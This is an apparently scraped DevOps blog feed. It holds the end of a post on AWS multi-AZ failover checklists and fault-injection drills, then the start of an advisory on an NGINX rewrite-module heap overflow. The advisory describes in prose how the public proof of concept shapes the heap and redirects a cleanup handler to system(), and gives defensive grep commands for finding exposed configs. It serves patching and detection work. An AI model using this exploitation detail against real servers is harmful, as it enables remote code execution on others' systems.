          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-multi-az-checklist-that-would-have-caught-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A surprising amount of AWS multi-AZ is opt-in. Going through the common stack:</p>
<pre><code class="hljs language-text">                                 +---------------+
                                 |   Route 53    |
                                 |  (health      |
                                 |   checks +    |
                                 |   failover)   |
                                 +-------+-------+
                                         |
                       +-----------------+-----------------+
                       |                                   |
                +------v-------+                   +-------v------+
                |   ALB        |                   |   ALB        |
                |  multi-AZ    |                   |  multi-AZ    |
                |  (zone A)    |                   |  (zone B)    |
                +------+-------+                   +-------+------+
                       |                                   |
            +----------+-----------+              +--------+---------+
            |          |           |              |        |         |
       +----v---+ +----v---+  +----v---+    +-----v--+ +---v----+ +--v-----+
       | EC2/   | | EC2/   |  | EC2/   |    | EC2/   | | EC2/   | | EC2/   |
       |  pod   | |  pod   |  |  pod   |    |  pod   | |  pod   | |  pod   |
       +--------+ +--------+  +--------+    +--------+ +--------+ +--------+
            \________/\__________/                \________/\________/
                    az-1                                  az-2

   RDS Multi-AZ standby in az-2.   S3 + DynamoDB global per region.
   Kafka MSK with min.insync.replicas across 3 AZs, ackS=all.
   Snapshots replicated to a second region nightly.
</code></pre><p>Concrete checks per service:</p>
<ul>
<li><strong>EC2 + Auto Scaling Groups</strong>: ASG must be configured with all three AZs in the region, with <code>availability_zones</code> explicit. <code>Capacity-Optimized-Prioritized</code> allocation. Run <code>aws autoscaling describe-auto-scaling-groups --query &#39;AutoScalingGroups[].[AutoScalingGroupName,AvailabilityZones]&#39;</code> and confirm every critical ASG lists three AZs.</li>
<li><strong>ALB</strong>: cross-zone load balancing on. The default is off for NLB and on for ALB, which is the opposite of what most operators assume. Verify with <code>aws elbv2 describe-load-balancer-attributes --load-balancer-arn $ARN</code>.</li>
<li><strong>RDS</strong>: <code>MultiAZ: true</code> and the reader endpoint actually used by reads. RDS Multi-AZ failover takes <a href="https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.Failover.html">60 to 120 seconds</a>, which is fine for most apps. The trap is apps that hardcode the primary endpoint and never failover the connection pool.</li>
<li><strong>EKS / Kubernetes</strong>: control plane is AWS-managed across three AZs by default. Worker node groups need explicit <code>subnets</code> covering three AZs. <code>kubectl get nodes -o wide</code> and check the topology label <code>topology.kubernetes.io/zone</code> spans three values. PodDisruptionBudgets + <code>topologySpreadConstraints</code> with <code>maxSkew: 1</code> and <code>topologyKey: topology.kubernetes.io/zone</code> for everything that matters.</li>
<li><strong>EBS</strong>: snapshots cross-AZ are automatic. Cross-region snapshot copies via AWS Backup or DLM are not, and are what saves you if a whole region degrades.</li>
<li><strong>MSK (managed Kafka)</strong>: 3-broker cluster across 3 AZs, <code>min.insync.replicas=2</code>, producer <code>acks=all</code>. The Coinbase post-incident language (&quot;matching engine and Kafka messaging infrastructure&quot;) suggests this was one of the failure points. A single-AZ Kafka under heavy producer load is the kind of latency-driven choice that bites.</li>
<li><strong>S3 + DynamoDB</strong>: both are regional, not zonal. They survived <code>use1-az4</code> without operator intervention. If your runbook is built on those primitives, your blast radius is already smaller.</li>
</ul>
<p>A surprising number of teams pass every audit on this list because every individual resource is multi-AZ, then fail in production because one shared piece of infrastructure (a self-hosted Redis, a homegrown service-discovery layer, a quotation engine that holds in-memory state) is single-AZ. The audit script you actually want is the one that walks the dependency graph of your most critical user-facing flow and flags every single-AZ node in it.</p>
<h2 id="h2-the-drill-that-proves-the-checklist" class="group relative scroll-mt-24">
        <a href="#h2-the-drill-that-proves-the-checklist" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The drill that proves the checklist
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-drill-that-proves-the-checklist"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The checklist above is necessary. It is not sufficient. The only thing that proves multi-AZ works is killing an AZ on purpose and watching the dashboard.</p>
<p>AWS Fault Injection Simulator (FIS) is the tool. The shape of a &quot;kill an AZ&quot; experiment template:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;description&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Simulate loss of use1-az4 EC2 capacity&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;roleArn&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;arn:aws:iam::123456789012:role/FISExperimentRole&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;stopConditions&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span>
    <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;source&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;aws:cloudwatch:alarm&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;arn:aws:cloudwatch:us-east-1:123456789012:alarm:UserErrorRateHigh&quot;</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">]</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;targets&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;EC2Instances-AZ4&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;resourceType&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;aws:ec2:instance&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;selectionMode&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;ALL&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;filters&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span>
        <span class="hljs-punctuation">{</span>
          <span class="hljs-attr">&quot;path&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Placement.AvailabilityZone&quot;</span><span class="hljs-punctuation">,</span>
          <span class="hljs-attr">&quot;values&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-string">&quot;use1-az4&quot;</span><span class="hljs-punctuation">]</span>
        <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
        <span class="hljs-punctuation">{</span>
          <span class="hljs-attr">&quot;path&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;State.Name&quot;</span><span class="hljs-punctuation">,</span>
          <span class="hljs-attr">&quot;values&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-string">&quot;running&quot;</span><span class="hljs-punctuation">]</span>
        <span class="hljs-punctuation">}</span>
      <span class="hljs-punctuation">]</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;actions&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;StopAZ4Instances&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;actionId&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;aws:ec2:stop-instances&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;parameters&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;startInstancesAfterDuration&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;PT30M&quot;</span> <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;targets&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;Instances&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;EC2Instances-AZ4&quot;</span> <span class="hljs-punctuation">}</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;tags&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;Name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;kill-az4-30min&quot;</span> <span class="hljs-punctuation">}</span>
<span class="hljs-punctuation">}</span>
</code></pre><p>The pattern that matters is the <strong>stop condition tied to a real customer-impact alarm</strong>. The experiment kills every EC2 instance in <code>use1-az4</code> for 30 minutes, but if the user-facing error rate alarm fires (because failover did not work), FIS aborts the experiment and the instances come back. That is the lock that lets you run this in production without ending your career.</p>
<p>Run it on a quarterly cadence. The first time, run it in staging at 09:00 on a Tuesday with the on-call team watching. The second time, run it in production at the same time. By the third time, run it on a Friday afternoon with nobody told in advance. If anything breaks at that point, you have found the thing that would have broken during the next thermal event, and you have found it with a stop-condition you control.</p>
<p>A few additional FIS actions worth chaining into the same template once the basic AZ kill is solid:</p>
<ul>
<li><code>aws:ec2:terminate-instances</code> instead of <code>stop-instances</code> for a more aggressive version that does not allow recovery without replacement.</li>
<li><code>aws:network:disrupt-connectivity</code> with scope <code>availability-zone</code> to simulate the network-partition variant.</li>
<li><code>aws:eks:pod-cpu-stress</code> to layer in worker-node pressure during the AZ failure.</li>
<li><code>aws:rds:failover-db-cluster</code> to deliberately fail an Aurora primary at the same moment.</li>
</ul>
<p>The most realistic single-AZ-failure drill is the one that combines AZ-level EC2 loss with RDS primary failover and 50% packet loss to S3, because that is closer to what happens during an actual hall-overheat event than any single FIS action on its own.</p>
<h2 id="h2-the-single-az-for-latency-exception" class="group relative scroll-mt-24">
        <a href="#h2-the-single-az-for-latency-exception" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The single-AZ-for-latency exception
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-single-az-for-latency-exception"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The honest version of this post acknowledges that single-AZ deployments are sometimes correct. Latency-sensitive trading systems, real-time bidding pipelines, and tight feedback-loop control planes all have cases where the extra 2-4 ms of cross-AZ round-trip is unaffordable.</p>
<p>If that is you, the test is not &quot;are we multi-AZ&quot;, the test is &quot;can we cut over to a hot standby in another AZ in under five minutes with one button&quot;. Concrete requirements:</p>
<ol>
<li>The standby exists and is <strong>continuously receiving traffic</strong>. Not &quot;warm&quot;. Not &quot;pre-provisioned&quot;. Actively serving a small percentage of read traffic at minimum, so its connection pools and caches are not cold.</li>
<li><strong>A documented promotion procedure</strong> that a single on-call engineer can execute from their laptop without consulting anyone. Less than 20 commands. Idempotent. Tested in the quarterly drill.</li>
<li><strong>Monitoring on the promotion path itself</strong>. The most common DR failure is &quot;we promoted, but the new primary&#39;s connection-pool size limit was 1000, and we have 5000 active clients trying to reconnect at once&quot;. Watch for it.</li>
<li><strong>An honest RTO number</strong>. Coinbase&#39;s outage was over five hours. Their RTO target before this incident is not public, but the only way &quot;more than 5 hours&quot; is the correct RTO for an exchange is if a regulator agreed to it in writing. For everyone else, the post-incident RTO target is the new floor.</li>
</ol>
<p>The Coinbase situation looks like the standby existed but had not been promoted under realistic conditions in some time. That is the single most common failure mode I have seen in production DR audits. The standby is real. It has just never been used in anger. The drill is what closes that gap.</p>
<h2 id="h2-what-to-do-this-week" class="group relative scroll-mt-24">
        <a href="#h2-what-to-do-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to do this week
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-do-this-week"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Five things, in order:</p>
<ol>
<li><strong>Run the inventory.</strong> <code>aws ec2 describe-instances --filters &quot;Name=availability-zone,Values=use1-az4&quot;</code> and equivalents for your critical regions. Anything in a single AZ that is in the customer-facing path needs a multi-AZ peer or a documented exception.</li>
<li><strong>Audit the dependency graph.</strong> The shared single-AZ resource is usually not in the obvious places (the database, the load balancer). It is in the homegrown bits (a service-discovery layer, a metric aggregator, an internal API gateway, a self-hosted Redis). Run the trace and flag every single-AZ node.</li>
<li><strong>Schedule the first FIS drill.</strong> Staging only, 30 minutes, working hours, on-call watching, stop-condition tied to a real alarm. Aim for next Tuesday.</li>
<li><strong>Write the promotion runbook.</strong> Numbered steps. Less than 20 commands. Idempotent. Reviewed by someone who was not on the team that wrote it.</li>
<li><strong>Set the cadence.</strong> Quarterly minimum. The drill that does not happen on a schedule is the drill that is not happening.</li>
</ol>
<p>The thermal event will repeat. AWS will have another one, in some other AZ, in some other quarter. So will GCP. So will Azure. The teams that recover in 30 minutes instead of 5 hours are not the teams with the better cloud architecture. They are the teams that have rehearsed.</p>
<h2 id="h2-sources" class="group relative scroll-mt-24">
        <a href="#h2-sources" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sources
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-sources"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>AWS service health page coverage of the May 7-8 incident: <a href="https://health.aws.amazon.com/">health.aws.amazon.com</a> and the AWS <a href="https://aws.amazon.com/premiumsupport/technology/pes/">Post-Event Summaries index</a></li>
<li>The Register coverage of the thermal event: <a href="https://www.theregister.com/off-prem/2026/05/08/aws-warns-of-ec2-impairment-as-power-loss-hits-notorious-us-east-1-region/5235509">theregister.com/off-prem/2026/05/08/aws-warns-of-ec2-impairment-as-power-loss-hits-notorious-us-east-1-region</a></li>
<li>Coinbase outage timeline and Rob Witoff statement: <a href="https://www.coindesk.com/business/2026/05/08/coinbase-disruption-tied-to-aws-outage-draws-criticism-amid-staff-layoffs-and-q1-losses">coindesk.com</a> and <a href="https://www.benzinga.com/crypto/26/05/52433912/coinbase-says-aws-cooling-failure-crashed-exchange-during-turbulent-week-ceo-brian-armstrong-calls-it-never-acceptable">benzinga.com</a></li>
<li>Service-impact roundup: <a href="https://statusgator.com/blog/may-7-2026-aws-outage-impact/">StatusGator</a></li>
<li>AWS FIS docs: <a href="https://aws.amazon.com/fis/">aws.amazon.com/fis</a></li>
<li>RDS Multi-AZ failover behaviour: <a href="https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.Failover.html">docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.Failover.html</a></li>
<li>Advanced Multi-AZ Resilience Patterns whitepaper: <a href="https://docs.aws.amazon.com/whitepapers/latest/advanced-multi-az-resilience-patterns/advanced-multi-az-resilience-patterns.html">docs.aws.amazon.com/whitepapers/latest/advanced-multi-az-resilience-patterns</a></li>
</ul>
<p>Drill the failover. The thermal event will return. The DR runbook that has never been used is not a runbook, it is a wish.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[NGINX Rift (CVE-2026-42945): The 18-Year-Old Rewrite Bug That Hands an Attacker Your Worker Process]]></title>
      <link>https://devops-daily.com/posts/nginx-rift-cve-2026-42945-rewrite-rce</link>
      <description><![CDATA[An autonomous code-audit tool found an 18-year-old heap overflow in NGINX's rewrite module. Affects every release from 0.6.27 through 1.30.0, plus NGINX Plus and the entire F5 product line. Full RCE PoC is public. Here is the one-line config grep that tells you whether you are exposed, the patch matrix, and what to do about the long tail of products that bundle the vulnerable nginx without a vendor patch yet.]]></description>
      <pubDate>Thu, 14 May 2026 12:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/nginx-rift-cve-2026-42945-rewrite-rce</guid>
      <category><![CDATA[Networking]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Networking]]></category><category><![CDATA[Security]]></category><category><![CDATA[NGINX]]></category><category><![CDATA[CVE]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>On May 13, 2026, F5 published <a href="https://my.f5.com/manage/s/article/K000161019">K000161019</a> and the <a href="https://nginx.org/en/security_advisories.html">security advisories list</a> at nginx.org picked up a new entry. The bug, branded &quot;NGINX Rift&quot; by its discoverer and tracked as <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42945">CVE-2026-42945</a>, is a heap buffer overflow in the rewrite module that has been sitting in <code>ngx_http_script.c</code> since the 0.6.27 release in 2008. Every nginx release between then and 1.30.0 is vulnerable. So is NGINX Plus through R36. So is every F5 product that ships nginx internally, including their commercial Ingress Controller, App Protect WAF, and Instance Manager.</p>
<p>A working remote code execution PoC is public on GitHub. There is no in-the-wild exploitation reported as of this morning, but the <a href="https://github.com/depthfirstdisclosures/nginx-rift">PoC repository</a> is small enough to read in one sitting and the exploit primitive is deterministic. The clock is short.</p>
<p>This post covers what the bug actually is, the one-line grep that tells you whether your config is exploitable (because the F5 advisory&#39;s &quot;vulnerable&quot; framing is broader than your actual exposure), the patch matrix across distros, and the long tail of OpenResty, Kong, APISIX, and other downstream products that have no advisory yet but ship the same vulnerable code.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><strong>CVE-2026-42945</strong>, CVSS v4 9.2 / v3 8.1. Heap buffer overflow in <code>ngx_http_rewrite_module</code> reachable by an unauthenticated HTTP request against any nginx running a vulnerable rewrite pattern.</li>
<li><strong>Affected</strong>: NGINX Open Source 0.6.27 through 1.30.0; NGINX Plus R32 through R36; F5 NGINX Ingress Controller 3.5.0-5.4.1, NGINX App Protect WAF 4.x and 5.x, NGINX Gateway Fabric, NGINX Instance Manager. OpenResty, Tengine, Angie, FreeNGINX, Kong, APISIX and the Kubernetes <code>ingress-nginx</code> project all ship the same <code>ngx_http_script.c</code> and should be treated as vulnerable until their maintainers ship a patched release.</li>
<li><strong>Fixed in</strong>: nginx 1.31.0 (mainline) and 1.30.1 (stable). NGINX Plus R36 P4, R35 P2, R32 P6.</li>
<li><strong>The trigger</strong> is operator-written config, not attacker-controlled config. A <code>rewrite</code> directive whose replacement contains <code>?</code> and uses an unnamed capture (<code>$1</code>, <code>$2</code>, etc.) referenced again by <code>set</code>, <code>if</code>, or a subsequent <code>rewrite</code> is enough. The attacker just sends one HTTP request with the right URL.</li>
<li><strong>Successful exploitation</strong> lands code execution as the nginx worker user (often <code>www-data</code> or <code>nginx</code>). Workers hold the TLS private key in memory and serve responses, so even non-root worker access is a serious incident.</li>
<li><strong>Detection</strong>: there are no published WAF rules from Cloudflare, AWS, or OWASP CRS yet. Grep your own configs. The one-liner is below.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Shell access to any host that runs nginx, or to a Kubernetes cluster running an nginx-based ingress controller.</li>
<li>The nginx config tree (<code>/etc/nginx/</code>, or your container image&#39;s equivalent).</li>
<li>Patience for one round of <code>grep</code> followed by either a package upgrade or a config audit.</li>
</ul>
<h2 id="h2-what-the-bug-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug actually is
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-bug-actually-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The rewrite module compiles every <code>rewrite</code>, <code>set</code>, <code>if</code>, and <code>return</code> directive into a small bytecode that runs once per request. The compiler produces two code arrays: a &quot;length&quot; array that calculates how many bytes the rewritten string will occupy, and a &quot;value&quot; array that actually writes those bytes.</p>
<p>Two state bits flow through this machine. One is <code>is_args</code>, which records whether the rewrite has crossed into the query-string portion of the URL. The other is the destination buffer pointer. The bug is that those two bits get out of sync when the rewrite uses an unnamed PCRE capture and the replacement contains <code>?</code>.</p>
<p>Concretely, after a <code>rewrite ^/api/(.+) /v2/$1?internal=1 break;</code> runs once, the engine permanently flips <code>is_args=1</code> on the main script engine. The length pass for the next <code>rewrite</code> (or <code>set</code>, or <code>if</code> referencing <code>$1</code>) runs through a zeroed sub-engine where <code>is_args=0</code>, so the capture-length code returns the raw byte count of <code>$1</code>. The copy pass sees <code>is_args=1</code> on the main engine and routes the same bytes through <code>ngx_escape_uri</code>, which expands characters like <code>+</code>, <code>%</code>, <code>&amp;</code>, and space into their percent-encoded forms. The destination buffer was sized for the raw count, so the expanded bytes write past the end of the allocation.</p>
<p>The corruption lands in the request pool. With cross-request heap shaping, the PoC walks the overflow into the <code>ngx_pool_cleanup_t</code> handler pointer and gets <code>system()</code> called with attacker-controlled arguments. Worker code execution follows. All the technical detail is in the <a href="https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability">depthfirst writeup</a> and the <a href="https://github.com/nginx/nginx/commit/2046b45aa0c6e712c216b9075886f3f26e9b4ca9">fix commit</a>.</p>
<p>Two important details for operators:</p>
<ol>
<li><strong>This is not a config-poisoning bug.</strong> Some vulnerability writeups make a bug sound less serious by noting it requires attacker-controlled nginx.conf. This one does not. Vulnerable configs are operator-written, common in API-gateway and reverse-proxy deployments, and the attacker only needs to send an HTTP request.</li>
<li><strong><code>nginx -t</code> does not flag the pattern.</strong> The vulnerable config is syntactically valid. There is no warning from the standard config check. You have to grep.</li>
</ol>
<h2 id="h2-find-vulnerable-configs-in-your-tree" class="group relative scroll-mt-24">
        <a href="#h2-find-vulnerable-configs-in-your-tree" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Find vulnerable configs in your tree
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-find-vulnerable-configs-in-your-tree"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The dangerous pattern needs three things together: a <code>rewrite</code> whose replacement contains <code>?</code>, the replacement contains an unnamed capture (<code>$1</code> through <code>$9</code>), and the same capture is read by a later <code>rewrite</code>, <code>set</code>, or <code>if</code> in the same <code>server</code> or <code>location</code> block.</p>
<p>The fast heuristic is a regex against your full config tree:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># List rewrite directives whose replacement carries both &#x27;?&#x27; and a $N capture.</span>
grep -RHnE <span class="hljs-string">&#x27;rewrite[[:space:]]+[^;]+\$[1-9][^;]*\?|rewrite[[:space:]]+[^;]+\?[^;]*\$[1-9]&#x27;</span> /etc/nginx/ 2&gt;/dev/null
</code></pre><p>That gives you the candidate <code>rewrite</code> lines. From there, walk the <code>server</code> and <code>location</code> blocks each lives in and confirm whether any <code>set $foo $1</code>, <code>if ($1 = &quot;...&quot;)</code>, or a second <code>rewrite</code> references the same capture. Those are the exploitable combinations.</p>
<p>If you run nginx inside Kubernetes via <code>ingress-nginx</code>, the same grep against the generated config inside the controller pod is the answer:</p>
<pre><code class="hljs language-bash">kubectl -n ingress-nginx <span class="hljs-built_in">exec</span> -ti deploy/ingress-nginx-controller -- \
  sh -c <span class="hljs-string">&quot;cat /etc/nginx/nginx.conf | grep -nE &#x27;rewrite[[:space:]]+[^;]+\\\$[1-9][^;]*\\?&#x27;&quot;</span>
</code></pre><p>The generated config aggregates every Ingress&#39;s annotations into one file. Snippets, <code>rewrite-target</code>, and <code>configuration-snippet</code> are the common sources.</p>
<p>If the grep is empty across your entire fleet, you are not currently exploitable. Upgrade anyway, because the next config change a developer pushes may add a vulnerable pattern, and you would rather not be running a binary whose CVE you already shrugged off.</p>
<h2 id="h2-the-patch-matrix" class="group relative scroll-mt-24">
        <a href="#h2-the-patch-matrix" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The patch matrix
        </a>
        <button 
